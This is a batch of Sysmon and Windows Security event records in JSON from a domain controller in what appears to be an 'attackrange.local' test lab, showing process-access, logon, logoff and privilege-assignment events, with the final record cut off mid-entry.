{"EventTime":"2020-08-01 06:54:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4662,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:39.844\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:39.844","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4663,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:39.844\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1056-5F25-0000-0010EB030000}\r\nTargetProcessId: 4\r\nTargetImage: System\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\kerberos.DLL+96ea2|C:\\Windows\\system32\\kerberos.DLL+79354|C:\\Windows\\system32\\kerberos.DLL+13948|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+2c2c4|C:\\Windows\\system32\\lsasrv.dll+31819|C:\\Windows\\system32\\lsasrv.dll+2f177|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+16cdd|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1a96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:39.844","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1056-5F25-0000-0010EB030000}","TargetProcessId":"4","TargetImage":"System","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\kerberos.DLL+96ea2|C:\\Windows\\system32\\kerberos.DLL+79354|C:\\Windows\\system32\\kerberos.DLL+13948|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+2c2c4|C:\\Windows\\system32\\lsasrv.dll+31819|C:\\Windows\\system32\\lsasrv.dll+2f177|C:\\Windows\\system32\\lsasrv.dll+2e101|C:\\Windows\\system32\\lsasrv.dll+16cdd|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1a96|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","EventReceivedTime":"2020-08-01 06:54:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220439,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6636A\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x6636a","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 06:54:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220440,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tDelegation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x6636A\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{80FFBC81-7395-8B57-4499-E8ABB785839F}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::bd2f:79cc:df6c:109f\r\n\tSource Port:\t\t52640\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x6636a","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{80FFBC81-7395-8B57-4499-E8ABB785839F}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::bd2f:79cc:df6c:109f","IpPort":"52640","ImpersonationLevel":"%%1840","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:54:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220441,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x662FC\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x662fc","LogonType":"3","EventReceivedTime":"2020-08-01 06:54:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220442,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x662B2\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x662b2","LogonType":"3","EventReceivedTime":"2020-08-01 06:54:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4664,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:39.844\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:39.844","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4665,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:39.844\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:39.844","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4666,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:39.844\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:39.844","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:39","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220443,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x661A5\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x661a5","LogonType":"3","EventReceivedTime":"2020-08-01 06:54:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:40","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4667,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:40.516\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 